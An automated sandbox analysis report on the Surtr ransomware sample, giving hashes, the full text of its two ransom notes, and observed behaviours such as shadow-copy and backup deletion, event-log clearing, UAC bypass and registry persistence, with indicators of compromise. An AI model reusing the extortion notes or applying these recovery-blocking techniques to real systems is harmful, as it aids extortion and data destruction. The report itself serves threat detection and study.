4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35

Analysis

max time kernel
141s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
02/03/2022, 08:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Surtr.exe
Size

191KB
MD5

664cf36657bf55f20cac44505d3bbb2c
SHA1

a48f8089455201895757503255d0f573ce5d3c66
SHA256

4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
SHA512

42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735

Score

10^/10

evasion persistence ransomware trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.txt

Ransom Note

What happened to your files? Unfortunately, your server was compromised, using a security hole in your server. All your files are encrypted with a military algorithm . in order to contact us you can email this address [email protected] use this ID( 0r6fjlh4j8u4ts ) for the title of your email. if you weren't able to contact us within 24 hours please email : Telegram id @Ransome_Decrypters Only we can decrypt your files. Please do not contact separate fraudulent sites. You can use freeand even paid software on the Internet, but it is uselessand will cause you to lose filesand timeand money.

Emails

[email protected]

Extracted

Path

C:\ProgramData\Service\SURTR_README.hta

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . your files will be sold on the Dark Web after 15 days. Imagine 1 million hackers have all your information including files, IP, name and number and location and ... Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (0r6fjlh4j8u4ts) for the title of your email . If you weren't able to contact us within 24 hours please email : Telegram id @Ransome_Decrypters If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

[email protected]

Signatures

Deletes NTFS Change Journal 2 TTPs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
ransomware

Inhibit System Recovery
T1490

Data Destruction
T1485
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
5712	bcdedit.exe
5892	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
5140	wbadmin.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000300000001ed19-130.dat	upx
behavioral2/files/0x000300000001ed32-139.dat	upx
behavioral2/files/0x000600000001db4f-140.dat	upx
behavioral2/files/0x000300000001e533-141.dat	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Surtr.exe

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe

Drops desktop.ini file(s) 28 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Links\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	Surtr.exe
File opened for modification	C:\Program Files\desktop.ini	Surtr.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	Surtr.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	Surtr.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	Surtr.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\G:	Surtr.exe
File opened (read-only)	\??\A:	Surtr.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\P:	Surtr.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\R:	Surtr.exe
File opened (read-only)	\??\T:	Surtr.exe
File opened (read-only)	\??\V:	Surtr.exe
File opened (read-only)	\??\E:	Surtr.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\N:	Surtr.exe
File opened (read-only)	\??\W:	Surtr.exe
File opened (read-only)	\??\B:	Surtr.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\K:	Surtr.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\O:	Surtr.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\Y:	Surtr.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\F:	Surtr.exe
File opened (read-only)	\??\H:	Surtr.exe
File opened (read-only)	\??\Q:	Surtr.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\L:	Surtr.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\X:	Surtr.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\M:	Surtr.exe
File opened (read-only)	\??\U:	Surtr.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\Z:	Surtr.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg"	Surtr.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTrial-pl.xrm-ms.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected].[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\ui-strings.js	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft SQL Server\SURTR_README.txt	Surtr.exe
File created	C:\Program Files\VideoLAN\VLC\locale\id\SURTR_README.hta	Surtr.exe
File created	C:\Program Files\Windows Defender\es-ES\SURTR_README.hta	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\SURTR_README.hta	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\SURTR_README.txt	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\SURTR_README.hta	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected].[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started-2x.png	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\SURTR_README.txt	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\SURTR_README.hta	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\new_icons.png.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar	Surtr.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\TimeCard.xltx	Surtr.exe
File created	C:\Program Files\Mozilla Firefox\browser\VisualElements\SURTR_README.hta	Surtr.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\SURTR_README.txt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\SURTR_README.txt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files\VideoLAN\VLC\locale\tr\SURTR_README.txt	Surtr.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\Context.snippets.ps1xml	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Viewer.aapp.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\hr-hr\SURTR_README.txt	Surtr.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\SURTR_README.hta	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\ui-strings.js.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\ui-strings.js.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\SURTR_README.hta	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main-selector.css.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\LICENSE	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_pdf_18.svg.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\SURTR_README.hta	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\bell_empty.png	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\he-il\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-ul-oob.xrm-ms	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLL	Surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac	Surtr.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\he-il\SURTR_README.txt	Surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\main.css	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ul-oob.xrm-ms	Surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp2-ul-oob.xrm-ms.[[email protected]].[0r6fjlh4j8u4ts].Surtr	Surtr.exe
File created	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\PrivateData_0r6fjlh4j8u4ts.surt	Surtr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
5172	schtasks.exe
5328	schtasks.exe
5268	schtasks.exe

Interacts with shadow copies 2 TTPs 52 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4620	vssadmin.exe
6160	vssadmin.exe
6844	vssadmin.exe
7512	vssadmin.exe
7596	vssadmin.exe
7588	vssadmin.exe
7384	vssadmin.exe
6324	vssadmin.exe
4264	vssadmin.exe
6024	vssadmin.exe
7416	vssadmin.exe
7652	vssadmin.exe
7900	vssadmin.exe
7868	vssadmin.exe
8020	vssadmin.exe
1896	vssadmin.exe
5684	vssadmin.exe
6916	vssadmin.exe
7876	vssadmin.exe
8168	vssadmin.exe
5488	vssadmin.exe
4504	vssadmin.exe
5676	vssadmin.exe
7304	vssadmin.exe
7604	vssadmin.exe
8176	vssadmin.exe
4060	vssadmin.exe
4176	vssadmin.exe
4204	vssadmin.exe
2796	vssadmin.exe
5900	vssadmin.exe
6880	vssadmin.exe
7552	vssadmin.exe
7884	vssadmin.exe
7800	vssadmin.exe
7396	vssadmin.exe
7424	vssadmin.exe
7752	vssadmin.exe
7780	vssadmin.exe
4804	vssadmin.exe
5724	vssadmin.exe
7504	vssadmin.exe
7228	vssadmin.exe
7792	vssadmin.exe
4616	vssadmin.exe
6800	vssadmin.exe
7472	vssadmin.exe
7524	vssadmin.exe
7568	vssadmin.exe
4128	vssadmin.exe
8088	vssadmin.exe
4756	vssadmin.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.surtr	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.surtr\ = "surtr_auto_file"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico"	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe
3600	Surtr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3600	Surtr.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeBackupPrivilege	6952	vssvc.exe
Token: SeRestorePrivilege	6952	vssvc.exe
Token: SeAuditPrivilege	6952	vssvc.exe
Token: SeBackupPrivilege	7288	wbengine.exe
Token: SeRestorePrivilege	7288	wbengine.exe
Token: SeSecurityPrivilege	7288	wbengine.exe
Token: SeSecurityPrivilege	5540	wevtutil.exe
Token: SeBackupPrivilege	5540	wevtutil.exe
Token: SeSecurityPrivilege	7196	wevtutil.exe
Token: SeBackupPrivilege	7196	wevtutil.exe
Token: SeSecurityPrivilege	1904	wevtutil.exe
Token: SeBackupPrivilege	1904	wevtutil.exe
Token: SeSecurityPrivilege	5276	wevtutil.exe
Token: SeBackupPrivilege	5276	wevtutil.exe
Token: SeSecurityPrivilege	6280	wevtutil.exe
Token: SeBackupPrivilege	6280	wevtutil.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
6336	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3600 wrote to memory of 680	3600	Surtr.exe	58
PID 3600 wrote to memory of 680	3600	Surtr.exe	58
PID 3600 wrote to memory of 680	3600	Surtr.exe	58
PID 3600 wrote to memory of 4044	3600	Surtr.exe	59
PID 3600 wrote to memory of 4044	3600	Surtr.exe	59
PID 3600 wrote to memory of 4044	3600	Surtr.exe	59
PID 3600 wrote to memory of 2404	3600	Surtr.exe	60
PID 3600 wrote to memory of 2404	3600	Surtr.exe	60
PID 3600 wrote to memory of 2404	3600	Surtr.exe	60
PID 2404 wrote to memory of 1840	2404	cmd.exe	61
PID 2404 wrote to memory of 1840	2404	cmd.exe	61
PID 2404 wrote to memory of 1840	2404	cmd.exe	61
PID 3600 wrote to memory of 1920	3600	Surtr.exe	64
PID 3600 wrote to memory of 1920	3600	Surtr.exe	64
PID 3600 wrote to memory of 1920	3600	Surtr.exe	64
PID 3600 wrote to memory of 3912	3600	Surtr.exe	67
PID 3600 wrote to memory of 3912	3600	Surtr.exe	67
PID 3600 wrote to memory of 2992	3600	Surtr.exe	66
PID 3600 wrote to memory of 2992	3600	Surtr.exe	66
PID 3600 wrote to memory of 1972	3600	Surtr.exe	75
PID 3600 wrote to memory of 1972	3600	Surtr.exe	75
PID 3600 wrote to memory of 1896	3600	Surtr.exe	70
PID 3600 wrote to memory of 1896	3600	Surtr.exe	70
PID 3600 wrote to memory of 3024	3600	Surtr.exe	74
